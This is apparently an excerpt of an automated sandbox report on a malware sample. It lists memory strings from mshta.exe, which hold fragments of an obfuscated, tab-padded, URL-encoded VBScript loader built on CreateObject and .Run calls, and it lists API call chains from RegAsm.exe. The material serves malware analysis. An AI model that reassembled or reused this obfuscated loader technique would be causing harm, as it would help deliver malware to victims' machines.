                    Source: mshta.exe, 0000000F.00000003.463237666.0000000004CEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m='%3C%21DOCTYPE%20html%3E%0A%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3DEmulateIE8%22%20%3E%0A%3Chtml%3E%0A%3Cbody%3E%0A%3CSCrIPT%20TYPe%3D%22TeXT/vBsCRiPT%22%3E%0ADim%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                    Source: mshta.exe, 0000000F.00000003.457873677.00000000047BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ipt language=JavaScript>m='%3C%21DOCTYPE%20html%3E%0A%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3DEmulateIE8%22%20%3E%0A%3Chtml%3E%0A%3Cbody%3E%0A%3CSCrIPT%20TYPe%3D%22TeXT/vBsCRiPT%22%3E%0ADim%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0
                    Source: mshta.exe, 00000003.00000003.412462864.0000000004BC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr.RUn%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09ChR%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                    Source: mshta.exe, 00000003.00000003.415540284.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.414249570.0000000003948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417476267.0000000003959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \7252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr.RUn%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                    Source: mshta.exe, 0000000F.00000003.464304675.00000000048EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.456917806.00000000048EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.457785520.00000000048EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "seTrpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr=creATeoBjeCT
                    Source: mshta.exe, 00000003.00000003.416874533.00000000001BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.412256965.00000000001BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.412234342.00000000001BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &KaIfUUMUNRDDxRBgPcvjLohfZHFlsFQBKctxCTWVYEpJupuYdWNlwJilYKzujbTxSScdFWgjFpqfFjjmnnZSDgrjHWeMPrzTLQAHdZEUjuwAgujfVyTOgBVjBMiUlxXYQsAQZXFjnovDYTKMDWjGiNjqiDAAzoEVISSmtLxlrtcVjAZoNdMcJOwPeOUmHKFRPMpEpjwiZegkOlsTZpoLMwXMRQeNLH&ChR(34),0
                    Source: mshta.exe, 00000003.00000003.412543918.0000000004B9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KaIfUUMUNRDDxRBgPcvjLohfZHFlsFQBKctxCTWVYEpJupuYdWNlwJilYKzujbTxSScdFWgjFpqfFjjmnnZSDgrjHWeMPrzTLQAHdZEUjuwAgujfVyTOgBVjBMiUlxXYQsAQZXFjnovDYTKMDWjGiNjqiDAAzoEVISSmtLxlrtcVjAZoNdMcJOwPeOUmHKFRPMpEpjwiZegkOlsTZpoLMwXMRQeNLH&ChR(34),0:
                    Source: mshta.exe, 00000003.00000003.415540284.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.414249570.0000000003948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417476267.0000000003959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                    Source: mshta.exe, 00000003.00000003.417201359.00000000001B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.412256965.00000000001AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.412234342.00000000001AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416954550.00000000001AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416874533.00000000001AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr0M
                    Source: mshta.exe, 00000003.00000003.417221996.000000000014E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417290381.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416939084.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416901521.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416962919.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.417181878.000000000014B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%29%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%26%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr.eXpandenviRonMEntsTRINgs%28%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0
                    Source: mshta.exe, 0000000F.00000003.457118573.0000000004CD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr.RUn%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09ChR%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_21-34250
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,33_2_0041CBE1
